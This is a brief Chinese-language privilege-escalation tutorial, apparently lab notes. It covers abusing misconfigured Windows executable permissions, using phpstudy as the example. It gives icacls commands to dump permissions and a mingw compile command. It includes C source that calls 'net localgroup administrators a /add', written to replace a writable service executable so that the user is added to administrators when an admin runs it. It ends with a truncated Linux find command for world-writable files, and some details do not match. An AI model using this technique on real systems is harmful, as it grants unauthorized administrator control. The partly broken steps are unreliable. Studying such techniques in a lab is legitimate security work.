利用配置不当提权

利用管理员对服务器的权限分配不当完成的权限提升（开发者的意识不够强）

一般情况下面 普通用户对程序是没有控制权的

icacls  
icacls c:\windows\*.exe /save perm /T 
i586-mingw32msvc-gcc -o admin.exe admin.c   （因为exe要给windows用所以这里使用i586-mingw32msvc-gcc这个编译

然后在c盘更目录下面生成了 asd文件 我们用记事本查看 就可以知道每一个exe的权限

但是很遗憾这种情况没有找到

我们看一下我们需要的脚本

#include<stdlib.h>
int main()
{
  int i;
  i=system("net localgroup administrators a /add");
  return 0;
}

这里为了满足实验要求 我们这里加一个普通用户

这里我们以phpstudy为例子 user配置不当 对他的操作是 完全控制

把我们刚才上传的exe改名为这个

然后当管理点击这个的时候 就是默认吧a加入管理员组

那么在liunx如何提权呐？？？

find / -perm 777 -exec ls -l {} \